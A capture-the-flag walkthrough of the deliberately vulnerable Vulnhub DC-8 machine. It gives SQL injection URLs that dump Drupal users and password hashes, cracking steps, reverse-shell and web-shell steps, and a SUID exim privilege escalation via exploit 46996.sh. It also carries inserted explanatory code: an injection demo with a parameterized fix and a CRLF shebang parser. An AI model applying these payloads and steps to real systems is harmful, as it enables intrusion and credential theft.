Vulnhub machine: DC-8

Tags: SQL injection, Drupal CMS, reverse shell, exim privilege escalation

0x00 Environment setup

Download: https://www.vulnhub.com/entry/dc-8,367/
Number of flags: 1
Attacker: kali
Attacker address: 192.168.1.31
Target description:

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing its job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

0x01 Information gathering

1. Discover the target's address

Command: arp-scan -l

The target's address is 192.168.1.37

2. Scan the target's open ports

Command: nmap -sV -p- 192.168.1.37

Ports 22 and 80 are open; look at port 80 first


It is the familiar Drupal CMS again.

0x02 SQL injection

Clicking the links on the left shows a nid parameter in the URL

It may be injectable; fuzz the parameter to see whether injection exists


It is a numeric (unquoted) injection whose query results are echoed in the page, so no quote is needed to break out and the output can be read directly with UNION SELECT.

Database name: http://192.168.1.37/?nid=1.1 union select database() --+

Tables: http://192.168.1.37/?nid=1.1 union select group_concat(table_name) from information_schema.tables where table_schema='d7db' --+

There is a users table; list its columns: http://192.168.1.37/?nid=1.1 union select group_concat(column_name) from information_schema.columns where table_name='users' --+

Query the usernames and password hashes:
Usernames: http://192.168.1.37/?nid=1.1 union select group_concat(name) from users --+
Password hashes: http://192.168.1.37/?nid=1.1 union select group_concat(pass) from users --+

Username    Password hash
admin       $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john        $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
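The following is an added example, not code from the original page or from Drupal: a constructed SQLite stand-in for the target's database that reproduces the numeric injection chain above (nid=1.1 to empty the first SELECT, then UNION SELECT group_concat(...) to pull the table list, usernames and hashes), next to the parameterized lookup that defeats it. Table and column names are assumptions, not the real Drupal 7 schema; sqlite_master plays the role of information_schema.

```python
import sqlite3

# Constructed stand-in for the target: a node table looked up by nid and a
# users table holding the two hashes dumped from the page. Names are
# assumptions, not the real Drupal 7 schema.
SCHEMA = """
CREATE TABLE node (nid INTEGER NOT NULL, title TEXT);
INSERT INTO node VALUES (1, 'Welcome'), (2, 'About us');
CREATE TABLE users (uid INTEGER NOT NULL, name TEXT, pass TEXT);
INSERT INTO users VALUES
  (1, 'admin', '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'),
  (2, 'john',  '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, nid):
    # nid is interpolated unquoted straight into the statement, so the payload
    # "1.1 union select ..." is valid SQL right after the "=" with no quote
    # breaking needed. 1.1 never equals an integer nid, so only the UNIONed
    # column comes back.
    sql = f"SELECT title FROM node WHERE nid = {nid}"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, nid):
    # Fail closed on anything that is not a plain integer, then bind the value
    # as a parameter so the driver never interprets it as SQL.
    if not str(nid).isdigit():
        raise ValueError("nid must be a non-negative integer")
    rows = con.execute("SELECT title FROM node WHERE nid = ?", (int(nid),))
    return [row[0] for row in rows]


# The page's three URLs translated to SQLite (no information_schema here;
# sqlite_master is the table list).
PAYLOADS = {
    "tables": "1.1 union select group_concat(name) from sqlite_master where type='table'",
    "names":  "1.1 union select group_concat(name) from users",
    "hashes": "1.1 union select group_concat(pass) from users",
}


def dump_via_injection(con):
    # Each payload echoes one comma-joined value; split it back into a list.
    return {k: vulnerable_lookup(con, p)[0].split(",") for k, p in PAYLOADS.items()}


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, 1))            # normal use: ['Welcome']
    for key, values in dump_via_injection(db).items():
        print(key, values)
    try:
        safe_lookup(db, PAYLOADS["hashes"])
    except ValueError as e:
        print("safe_lookup rejected the payload:", e)
```

The hardened version does two independent things: it validates that nid is an integer before it goes anywhere near SQL, and it binds the value as a parameter. Either alone stops this payload; together they also stop the blind and stacked variants that a type check alone would not.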

0x03 Cracking the hashes with john

Save the usernames and hashes retrieved above to a file


Brute-force them with john. Command: john users.txt

john's password is recovered, but admin's is not: john / turtle

0x04 Reverse shell

With a username and password, log in to the back end. Drupal's default login page: 192.168.1.37/user

Login succeeds, but since this is not the admin account only one page can be edited


Write a one-line PHP web shell into it


The web shell cannot be connected to, so get a reverse shell instead


Fill in the Contact Us page with anything and submit it


The reverse shell comes back. Upgrade it to a proper tty with: python -c "import pty;pty.spawn('/bin/bash')"

0x05 Privilege escalation

Use find to look for SUID binaries owned by root: find / -user root -perm -4000 -print 2>/dev/null

This turns up exim4. Exim is a mail transfer agent used on Unix systems, and because the exim4 binary is SUID root it runs with root privileges when invoked.
Check the exim version. Command: /usr/sbin/exim4 --version

Search for exim exploits. Command: searchsploit exim

Copy the exploit script out of searchsploit


Start a temporary HTTP server on kali so the target can download the script. Command: python -m SimpleHTTPServer

Download the script on the target and make it executable:


Run the script on the target:


But it will not run; it keeps erroring out.
The cause: 46996.sh has DOS (CRLF) line endings. The kernel reads the interpreter path on the #! line up to the newline, so the trailing carriage return becomes part of the path and the script fails with "/bin/bash^M: bad interpreter". To run 46996.sh, its line endings must be converted to Unix format. On kali, open it with vi 46996.sh, enter :set ff=unix and save the file.

Then delete the 46996.sh downloaded earlier on the target and download it again:
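To make the failure above concrete, here is an added example (not from the page or the exploit) that parses a script's shebang the way the kernel's binfmt_script loader does and shows why a CRLF file names a non-existent interpreter "/bin/bash\r". The two-line script is constructed and stands in for 46996.sh; its contents are an assumption, not the exploit.

```python
import re

# Constructed CRLF script standing in for 46996.sh as it arrived on the target.
DOS_SCRIPT = b"#!/bin/bash\r\necho hello\r\n"


def shebang_interpreter(script: bytes):
    """Interpreter path as the kernel sees it: the text after '#!' up to the
    first space, tab or newline. A carriage return is none of those, so with
    CRLF endings it stays glued to the path and execve fails with ENOENT."""
    if not script.startswith(b"#!"):
        return None
    first_line = script.split(b"\n", 1)[0][2:].lstrip(b" \t")
    return re.split(rb"[ \t]", first_line, maxsplit=1)[0]


def has_crlf(script: bytes) -> bool:
    return b"\r\n" in script


def to_unix(script: bytes) -> bytes:
    """Same effect as vim's :set ff=unix, dos2unix, or sed -i 's/\\r$//'."""
    return script.replace(b"\r\n", b"\n")


if __name__ == "__main__":
    print(shebang_interpreter(DOS_SCRIPT))           # b'/bin/bash\r'  ("bad interpreter")
    print(shebang_interpreter(to_unix(DOS_SCRIPT)))  # b'/bin/bash'
```

On the target itself, `file 46996.sh` reports "with CRLF line terminators" and `head -1 46996.sh | od -c` shows the `\r` before `\n`, which is a quicker check than re-downloading blind.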


Run: ./46996.sh -m netcat

We now have root, but this shell is unstable, so spawn another reverse shell from it. The listener on port 7777 receives the new shell.


The flag is in /root


Since I don't log in every day, I can't reply promptly to private messages or comments. If you want to reach me, email is best: Z2djMjUxMTBAMTYzLmNvbQ==. If you email, please mark it with “”


References

1. Vulnhub machine walkthrough: DC-8
2. VulnHub: DC-8
3. Shell script error: -bash: xxx: /bin/bash^M: bad interpreter: No such file or directory
